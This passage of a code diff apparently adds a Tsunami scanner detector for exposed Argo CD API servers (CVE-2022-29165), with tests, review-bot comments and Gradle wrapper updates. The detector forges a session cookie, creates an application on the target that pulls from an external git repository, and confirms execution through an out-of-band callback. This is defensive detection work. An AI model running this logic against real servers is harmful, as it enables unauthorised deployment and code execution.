.get("items") + .getAsJsonArray() + .get(0) + .getAsJsonObject() + .get("metadata") + .getAsJsonObject() + .get("name") + .getAsString(); + } catch (IllegalStateException | NullPointerException | JsonParseException e) { + return false; + } + + // 2. 
Get the first cluster name + String clustersUrl = targetUrl + "api/v1/clusters"; + response = + httpClient.send(get(clustersUrl).setHeaders(baseHeaders.build()).build(), networkService); + if (response.bodyString().isEmpty()) { + return false; + } + String clusterName = ""; + try { + clusterName = + JsonParser.parseString(response.bodyString().get()) + .getAsJsonObject() + .get("items") + .getAsJsonArray() + .get(0) + .getAsJsonObject() + .get("server") + .getAsString(); + } catch (IllegalStateException | NullPointerException | JsonParseException e) { + return false; + } + + // 3. Create an application to trigger the OOB + Payload callbackPayload = getTsunamiCallbackHttpPayload(); + if (callbackPayload == null + || !callbackPayload.getPayloadAttributes().getUsesCallbackServer()) { + logger.atWarning().log( + "The Tsunami callback server is not setup for this environment," + + " so we cannot confirm the RCE callback"); + return false; + } + String payload = + String.format( + CREATE_APPLICATION_TEMPLATE, + clusterName, + PAYLOAD_GIT_PATH, + PAYLOAD_GIT_URL, + callbackPayload.getPayload(), + projectName); + String createAppUrl = targetUrl + "api/v1/applications?upsert=true"; + response = + httpClient.send( + post(createAppUrl) + .setHeaders(baseHeaders.addHeader("Content-Type", "application/json").build()) + .setRequestBody(ByteString.copyFromUtf8(payload)) + .build(), + networkService); + // If we send a req with http it will redirect us to https with a 307 status code, + // but by default our client doesn't redirect a POST request with 307 status code and a + // location header in first response + if (response.status().isRedirect() + && response.headers().get("Location").orElse(null) != null) { + logger.atInfo().log("redirect to %s", response.headers().get("Location")); + response = + httpClient.send( + post(response.headers().get("Location").get()) + .setHeaders(baseHeaders.addHeader("Content-Type", "application/json").build()) + 
.setRequestBody(ByteString.copyFromUtf8(payload)) + .build(), + networkService); + } + Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(oobSleepDuration)); + if (callbackPayload.checkIfExecuted()) { + logger.atInfo().log("Confirmed OOB Payload execution."); + deleteTestApplicationRequest(networkService, baseHeaders, targetUrl); + return true; + } + } catch (IOException e) { + logger.atWarning().withCause(e).log("Unable to query '%s'.", targetUrl); + deleteTestApplicationRequest(networkService, baseHeaders, targetUrl); + return false; + } + deleteTestApplicationRequest(networkService, baseHeaders, targetUrl); + return false; + } + + private void deleteTestApplicationRequest( + NetworkService networkService, HttpHeaders.Builder baseHeaders, String targetUrl) { + try { + logger.atInfo().log("Try to delete the new application which was for testing purpose."); + String deleteAppUrl = + targetUrl + + "api/v1/applications/tsunami-security-scanner?cascade=true&" + + "propagationPolicy=foreground&appNamespace=argocd"; + HttpResponse response = + httpClient.send( + delete(deleteAppUrl) + .setHeaders(baseHeaders.addHeader("Content-Type", "application/json").build()) + .setRequestBody(ByteString.copyFromUtf8("{}")) + .build(), + networkService); + // same as last comment about redirection + if (response.status().isRedirect() + && response.headers().get("Location").orElse(null) != null) { + logger.atInfo().log("redirect to %s", response.headers().get("Location")); + httpClient.send( + delete(response.headers().get("Location").get()) + .setHeaders(baseHeaders.addHeader("Content-Type", "application/json").build()) + .setRequestBody(ByteString.copyFromUtf8("{}")) + .build(), + networkService); + } + } catch (IOException e) { + logger.atWarning().withCause(e).log("Unable to delete application."); + } + } + + private Payload getTsunamiCallbackHttpPayload() { + try { + return this.payloadGenerator.generate( + PayloadGeneratorConfig.newBuilder() + 
.setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.BLIND_RCE) + .setInterpretationEnvironment( + PayloadGeneratorConfig.InterpretationEnvironment.LINUX_SHELL) + .setExecutionEnvironment( + PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT) + .build()); + } catch (NotImplementedException n) { + return null; + } + } + + private DetectionReport buildDetectionReport( + TargetInfo targetInfo, + NetworkService vulnerableNetworkService, + String description, + String recommendation, + Severity severity) { + return DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(vulnerableNetworkService) + .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("ARGOCD_API_SERVER_EXPOSED")) + .setSeverity(severity) + .setTitle("Argo CD API server Exposed") + .setDescription(description) + .setRecommendation(recommendation)) + .build(); + } +} diff --git a/community/detectors/argocd_exposed_ui/src/main/java/com/google/tsunami/plugins/detectors/exposedui/argocd/ExposedArgoCdApiDetectorBootstrapModule.java b/community/detectors/argocd_exposed_ui/src/main/java/com/google/tsunami/plugins/detectors/exposedui/argocd/ExposedArgoCdApiDetectorBootstrapModule.java new file mode 100644 index 000000000..1584705a5 --- /dev/null +++ b/community/detectors/argocd_exposed_ui/src/main/java/com/google/tsunami/plugins/detectors/exposedui/argocd/ExposedArgoCdApiDetectorBootstrapModule.java 
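Review bot: The application that `checkExposedArgoCdWithOutOfBandCallback` creates on the target points at `PAYLOAD_GIT_URL` (judging by the URL, a repository under the plugin author's GitHub account) with `\"targetRevision\":\"HEAD\"` and an automated sync policy, so whatever that repository holds at scan time is what a vulnerable instance fetches and syncs. The scan's effect on the target then depends on content outside this project's review; I would host the payload in a project-controlled repository and pin the revision in `CREATE_APPLICATION_TEMPLATE`, e.g. `\"targetRevision\":\"<reviewed-commit-sha>\"`. Separately, both `.get(0)` lookups on the `items` array throw `IndexOutOfBoundsException` for an empty list, which the multi-catch does not cover, so the exception would escape into the `forEach` in `detect`; extend it to `} catch (IllegalStateException | IndexOutOfBoundsException | NullPointerException | JsonParseException e) {`. Cleanup also deserves a check: `deleteTestApplicationRequest` hard-codes `appNamespace=argocd` and ignores the response status, so on an installation that uses another namespace the test application may be left behind, though the server's behaviour cannot be confirmed from this hunk.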
@@ -0,0 +1,39 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.detectors.exposedui.argocd; + +import com.google.inject.Provides; +import com.google.tsunami.plugin.PluginBootstrapModule; +import com.google.tsunami.plugins.detectors.exposedui.argocd.Annotations.OobSleepDuration; + +/** A {@link PluginBootstrapModule} for {@link ExposedArgoCdApiDetector}. */ +public final class ExposedArgoCdApiDetectorBootstrapModule extends PluginBootstrapModule { + + @Override + protected void configurePlugin() { + registerPlugin(ExposedArgoCdApiDetector.class); + } + + @Provides + @OobSleepDuration + int provideOobSleepDuration(ExposedArgoCdApiDetectorConfigs configs) { + if (configs.oobSleepDuration == 0) { + return 20; + } + return configs.oobSleepDuration; + } +} diff --git a/community/detectors/argocd_exposed_ui/src/main/java/com/google/tsunami/plugins/detectors/exposedui/argocd/ExposedArgoCdApiDetectorConfigs.java b/community/detectors/argocd_exposed_ui/src/main/java/com/google/tsunami/plugins/detectors/exposedui/argocd/ExposedArgoCdApiDetectorConfigs.java new file mode 100644 index 000000000..2995c17ac --- /dev/null +++ b/community/detectors/argocd_exposed_ui/src/main/java/com/google/tsunami/plugins/detectors/exposedui/argocd/ExposedArgoCdApiDetectorConfigs.java 
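Review bot: `provideOobSleepDuration` treats only exactly `0` as unset, so a negative `oobSleepDuration` from configuration is passed through unchanged and reaches `Duration.ofSeconds(oobSleepDuration)` just before the callback check in the detector. A negative wait most likely returns immediately, in which case the out-of-band confirmation would be missed and the finding reported at the lower severity or not at all. I would change the guard to `if (configs.oobSleepDuration <= 0) {`. I would also move the fallback into a named constant, for example `private static final int DEFAULT_OOB_SLEEP_SECONDS = 20;`, so the unit is visible where the default is chosen.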
@@ -0,0 +1,23 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.exposedui.argocd; + +import com.google.tsunami.common.config.annotations.ConfigProperties; + +@ConfigProperties("plugins.community.detectors.argocd_exposed_ui") +final class ExposedArgoCdApiDetectorConfigs { + int oobSleepDuration; +} diff --git a/community/detectors/argocd_exposed_ui/src/test/java/com/google/tsunami/plugins/detectors/exposedui/argocd/ExposedArgoCdApiDetectorTest.java b/community/detectors/argocd_exposed_ui/src/test/java/com/google/tsunami/plugins/detectors/exposedui/argocd/ExposedArgoCdApiDetectorTest.java new file mode 100644 index 000000000..56625c624 --- /dev/null +++ b/community/detectors/argocd_exposed_ui/src/test/java/com/google/tsunami/plugins/detectors/exposedui/argocd/ExposedArgoCdApiDetectorTest.java 
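Review bot: The `oobSleepDuration` field has no comment, so neither its unit nor the meaning of an unset value can be read from this class. The detector passes the value to `Duration.ofSeconds(...)` and the bootstrap module substitutes 20 when it is 0. I would add `/** Seconds to wait for the out-of-band callback; 0 (unset) falls back to the module default. */` above the field, plus a one-line class Javadoc naming the `plugins.community.detectors.argocd_exposed_ui` prefix.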
@@ -0,0 +1,427 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.detectors.exposedui.argocd; + +import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; +import static com.google.tsunami.plugins.detectors.exposedui.argocd.ExposedArgoCdApiDetector.PAYLOAD_ARGOCD_TOKEN_SESSION; + +import com.google.common.collect.ImmutableList; +import com.google.common.truth.Truth; +import com.google.inject.Guice; +import com.google.inject.testing.fieldbinder.Bind; +import com.google.inject.testing.fieldbinder.BoundFieldModule; +import com.google.inject.util.Modules; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.common.time.testing.FakeUtcClockModule; +import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule; +import com.google.tsunami.plugin.payload.testing.PayloadTestHelper; +import com.google.tsunami.plugins.detectors.exposedui.argocd.Annotations.OobSleepDuration; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import 
com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.nio.charset.StandardCharsets; +import java.security.SecureRandom; +import java.time.Instant; +import java.util.Arrays; +import java.util.Objects; +import javax.inject.Inject; +import okhttp3.mockwebserver.Dispatcher; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import okhttp3.mockwebserver.RecordedRequest; +import org.junit.After; +import org.junit.Before; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; +import org.junit.Test; + +/** Unit tests for {@link ExposedArgoCdApiDetector}. */ +@RunWith(JUnit4.class) +public final class ExposedArgoCdApiDetectorTest { + private final FakeUtcClock fakeUtcClock = + FakeUtcClock.create().setNow(Instant.parse("2024-12-03T00:00:00.00Z")); + + private final MockWebServer mockTargetService = new MockWebServer(); + private final MockWebServer mockCallbackServer = new MockWebServer(); + + @Inject private ExposedArgoCdApiDetector detector; + + TargetInfo targetInfo; + NetworkService targetNetworkService; + private final SecureRandom testSecureRandom = + new SecureRandom() { + @Override + public void nextBytes(byte[] bytes) { + Arrays.fill(bytes, (byte) 0xFF); + } + }; + + @Bind(lazy = true) + @OobSleepDuration + private int sleepDuration = 1; + + private void createInjector() { + Guice.createInjector( + new FakeUtcClockModule(fakeUtcClock), + new HttpClientModule.Builder().build(), + FakePayloadGeneratorModule.builder() + .setCallbackServer(mockCallbackServer) + .setSecureRng(testSecureRandom) + .build(), + Modules.override(new ExposedArgoCdApiDetectorBootstrapModule()) + .with(BoundFieldModule.of(this))) + .injectMembers(this); + } + + @Before + public void setUp() throws IOException { + mockCallbackServer.start(); + } + + @After + public void tearDown() throws Exception { + 
mockTargetService.shutdown(); + mockCallbackServer.shutdown(); + } + + @Test + public void detect_whenVulnerable_returnsVulnerability_Cve202229165_Oob() throws IOException { + startMockWebServerForTestingWithOob(true); + createInjector(); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockSuccessfulCallbackResponse()); + + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + + assertThat(detectionReports.getDetectionReportsList()) + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(targetNetworkService) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("ARGOCD_API_SERVER_EXPOSED")) + .setSeverity(Severity.CRITICAL) + .setTitle("Argo CD API server Exposed") + .setDescription( + "Argo CD API server is vulnerable to CVE-2022-29165. The authentication" + + " of Argo CD API server can be bypassed and All applications can" + + " be accessed by public and therefore can be modified resulting" + + " in all application instances being compromised. The Argo CD UI" + + " does not support executing OS commands in the hosting machine" + + " at this time. We detected this vulnerable Argo CD API server by" + + " receiving a HTTP response from an endpoint that needs" + + " authentication") + .setRecommendation( + "Patched versions are 2.1.15, and 2.3.4, and 2.2.9, and" + + " 2.1.15. 
Please update Argo CD to these versions and higher.")) + .build()); + Truth.assertThat(mockTargetService.getRequestCount()).isEqualTo(5); + Truth.assertThat(mockCallbackServer.getRequestCount()).isEqualTo(1); + } + + @Test + public void detect_whenVulnerable_returnsVulnerability_Cve202229165_Resp_Matching() + throws IOException { + startMockWebServerForTestingWithResponseMatching(true); + createInjector(); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockUnsuccessfulCallbackResponse()); + + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + + assertThat(detectionReports.getDetectionReportsList()) + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(targetNetworkService) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("ARGOCD_API_SERVER_EXPOSED")) + .setSeverity(Severity.HIGH) + .setTitle("Argo CD API server Exposed") + .setDescription( + "Argo CD API server is vulnerable to CVE-2022-29165. The authentication" + + " can be bypassed. We can't confirm that this API server has an" + + " admin role because we can't create a new application and" + + " receive an out-of-band callback from it, but we are able to" + + " receive some endpoint data without authentication") + .setRecommendation( + "Patched versions are 2.1.15, and 2.3.4, and 2.2.9, and" + + " 2.1.15. 
Please update Argo CD to these versions and higher.")) + .build()); + Truth.assertThat(mockTargetService.getRequestCount()).isEqualTo(4); + Truth.assertThat(mockCallbackServer.getRequestCount()).isEqualTo(0); + } + + @Test + public void detect_whenVulnerable_returnsVulnerability_Exposed_Ui_Oob() throws IOException { + startMockWebServerForTestingWithOob(false); + createInjector(); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockSuccessfulCallbackResponse()); + + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + + assertThat(detectionReports.getDetectionReportsList()) + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(targetNetworkService) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("ARGOCD_API_SERVER_EXPOSED")) + .setSeverity(Severity.CRITICAL) + .setTitle("Argo CD API server Exposed") + .setDescription( + "Argo CD API server is misconfigured. The API server is not" + + " authenticated. All applications can be accessed by the public" + + " and therefore can be modified resulting in all application" + + " instances being compromised. The Argo CD UI does not support" + + " executing OS commands in the hosting machine at this time. 
We" + + " detected this vulnerable Argo CD API server by creating a test" + + " application and receiving out-of-band callback") + .setRecommendation( + "Please disable public access to your Argo CD API server.")) + .build()); + Truth.assertThat(mockTargetService.getRequestCount()).isEqualTo(4); + Truth.assertThat(mockCallbackServer.getRequestCount()).isEqualTo(1); + } + + @Test + public void detect_whenVulnerable_returnsVulnerability_Exposed_Ui_Resp_Matching() + throws IOException { + startMockWebServerForTestingWithResponseMatching(false); + createInjector(); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockUnsuccessfulCallbackResponse()); + + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + + assertThat(detectionReports.getDetectionReportsList()) + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(targetNetworkService) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("ARGOCD_API_SERVER_EXPOSED")) + .setSeverity(Severity.HIGH) + .setTitle("Argo CD API server Exposed") + .setDescription( + "Argo CD API server is misconfigured. 
The API server is not" + + " authenticated.We can't confirm that this API server has an" + + " admin role because we can't create a new application and" + + " receive an out-of-band callback from it, but we are able to" + + " receive some endpoint data without authentication") + .setRecommendation( + "Please disable public access to your Argo CD API server.")) + .build()); + Truth.assertThat(mockTargetService.getRequestCount()).isEqualTo(3); + Truth.assertThat(mockCallbackServer.getRequestCount()).isEqualTo(0); + } + + @Test + public void detect_ifNotVulnerable_doesNotReportVuln_Exposed_Ui() throws IOException { + startMockWebServerForTestingWithOob(false); + createInjector(); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockUnsuccessfulCallbackResponse()); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockUnsuccessfulCallbackResponse()); + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + Truth.assertThat(mockTargetService.getRequestCount()).isEqualTo(10); + } + + @Test + public void detect_ifNotVulnerable_doesNotReportVuln_Cve202229165() throws IOException { + startMockWebServerAlwaysReturn403(); + createInjector(); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockUnsuccessfulCallbackResponse()); + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + Truth.assertThat(mockTargetService.getRequestCount()).isEqualTo(4); + } + + private void startMockWebServerForTestingWithOob(boolean mustHaveForgedCookie) + throws IOException { + final Dispatcher dispatcher = + new Dispatcher() { + @Override + public MockResponse dispatch(RecordedRequest request) { + // if withAnForgedCookie is True then we should check the forged cookie for all requests + if (mustHaveForgedCookie + && !Objects.equals( 
+ request.getHeaders().get("Cookie"), PAYLOAD_ARGOCD_TOKEN_SESSION)) { + return new MockResponse().setResponseCode(403); + } + // get an existing model name + if (Objects.equals(request.getPath(), "/api/v1/projects?fields=items.metadata.name") + && request.getMethod().equals("GET")) { + return new MockResponse() + .setBody("{\"items\":[{\"metadata\":{\"name\":\"default\"}}]}") + .setResponseCode(200); + } + // Attempting to unload model + if (Objects.equals(request.getPath(), "/api/v1/clusters") + && request.getMethod().equals("GET")) { + return new MockResponse() + .setBody( + "{\"metadata\": {},\"items\": [{\"server\": " + + "\"https://kubernetes.default.svc\",\"name\": \"in-cluster\"," + + "\"config\": {\"tlsClientConfig\": {\"insecure\": false}}}]}") + .setResponseCode(200); + } + // Creating model repo layout: uploading the model + // Or Creating model repo layout: uploading model config + if (Objects.equals(request.getPath(), "/api/v1/applications")) { + if (request.getMethod().equals("POST") + && !request.getBody().readString(StandardCharsets.UTF_8).isEmpty() + && Objects.requireNonNull(request.getHeaders().get("Content-Type")) + .equals("application/json") + && (Objects.equals(request.getBody().readString(StandardCharsets.UTF_8), "s") + || request.getBody().readString(StandardCharsets.UTF_8).startsWith("s"))) { + return new MockResponse().setResponseCode(200); + } + } + // Loading model to trigger payload + if (Objects.equals( + request.getPath(), + "/api/v1/applications/tsunami-security-scanner?cascade=true&" + + "propagationPolicy=foreground&appNamespace=argocd")) { + if (request.getMethod().equals("DELETE") + && request.getBody().readString(StandardCharsets.UTF_8).isEmpty()) { + return new MockResponse().setResponseCode(200); + } + } + return new MockResponse().setBody("[{}]").setResponseCode(200); + } + }; + mockTargetService.setDispatcher(dispatcher); + mockTargetService.start(); + mockTargetService.url("/"); + + targetNetworkService = + 
NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockTargetService.getHostName(), mockTargetService.getPort())) + .addSupportedHttpMethods("POST") + .build(); + targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(targetNetworkService.getNetworkEndpoint()) + .build(); + } + + private void startMockWebServerForTestingWithResponseMatching(boolean mustHaveForgedCookie) + throws IOException { + final Dispatcher dispatcher = + new Dispatcher() { + @Override + public MockResponse dispatch(RecordedRequest request) { + // if withAnForgedCookie is True then we should check the forged cookie for all requests + if (mustHaveForgedCookie + && !Objects.equals( + request.getHeaders().get("Cookie"), PAYLOAD_ARGOCD_TOKEN_SESSION)) { + return new MockResponse().setResponseCode(403); + } + // get an existing model name + if (Objects.equals(request.getPath(), "/api/v1/certificates") + && request.getMethod().equals("GET")) { + return new MockResponse() + .setBody( + "{\"metadata\":{},\"items\":[{\"serverName\":\"github.com\",\"certType\":" + + "\"ssh\",\"certSubType\":\"ecdsa-sha2-nistp256\",\"certData\":null,\"certInfo\":\"SHA256:p2QAMXNIC1TJYWeIOttrVc98/R1BUFWu3/LiyKgUfQM\"}]}") + .setResponseCode(200); + } + return new MockResponse().setResponseCode(403); + } + }; + mockTargetService.setDispatcher(dispatcher); + mockTargetService.start(); + mockTargetService.url("/"); + + targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockTargetService.getHostName(), mockTargetService.getPort())) + .addSupportedHttpMethods("POST") + .build(); + targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(targetNetworkService.getNetworkEndpoint()) + .build(); + } + + private void startMockWebServerAlwaysReturn403() throws IOException { + final Dispatcher dispatcher = + new Dispatcher() { + @Override + public MockResponse dispatch(RecordedRequest request) { + return new MockResponse().setResponseCode(403); + } + }; + 
mockTargetService.setDispatcher(dispatcher); + mockTargetService.start(); + mockTargetService.url("/"); + + targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockTargetService.getHostName(), mockTargetService.getPort())) + .addSupportedHttpMethods("POST") + .build(); + targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(targetNetworkService.getNetworkEndpoint()) + .build(); + } +} diff --git a/community/detectors/atlassian_confluence_cve_2023_22518/gradle/wrapper/gradle-wrapper.properties b/community/detectors/atlassian_confluence_cve_2023_22518/gradle/wrapper/gradle-wrapper.properties index 8f9797cb5..d04736436 100644 --- a/community/detectors/atlassian_confluence_cve_2023_22518/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/atlassian_confluence_cve_2023_22518/gradle/wrapper/gradle-wrapper.properties @@ -1,6 +1,6 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip networkTimeout=10000 validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME diff --git a/community/detectors/bigip_cve_2022_1388/gradle/wrapper/gradle-wrapper.jar b/community/detectors/bigip_cve_2022_1388/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/bigip_cve_2022_1388/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/bigip_cve_2022_1388/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/bigip_cve_2022_1388/gradle/wrapper/gradle-wrapper.properties b/community/detectors/bigip_cve_2022_1388/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/bigip_cve_2022_1388/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/bigip_cve_2022_1388/gradle/wrapper/gradle-wrapper.properties 
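Review bot: In the dispatcher of `startMockWebServerForTestingWithOob`, the `POST /api/v1/applications` branch calls `request.getBody().readString(StandardCharsets.UTF_8)` three times, but reading an okio `Buffer` consumes it, so the later reads see an empty string and the branch can never match. The `DELETE` branch has a related mismatch: it requires an empty body, while the detector's `deleteTestApplicationRequest` sets `{}` as the request body. Both requests therefore appear to fall through to the catch-all `200` with `[{}]`, so the tests pass on request counts alone and never check that the test application is created and then removed from the target. I would read the body once with `String body = request.getBody().readUtf8();`, reuse `body` in the conditions, and compare the DELETE body with `"{}"`. The inline comments about models ("get an existing model name", "Loading model to trigger payload") look copied from another detector and should describe the Argo CD endpoints instead.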
@@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/bigip_cve_2022_1388/gradlew b/community/detectors/bigip_cve_2022_1388/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/bigip_cve_2022_1388/gradlew +++ b/community/detectors/bigip_cve_2022_1388/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" 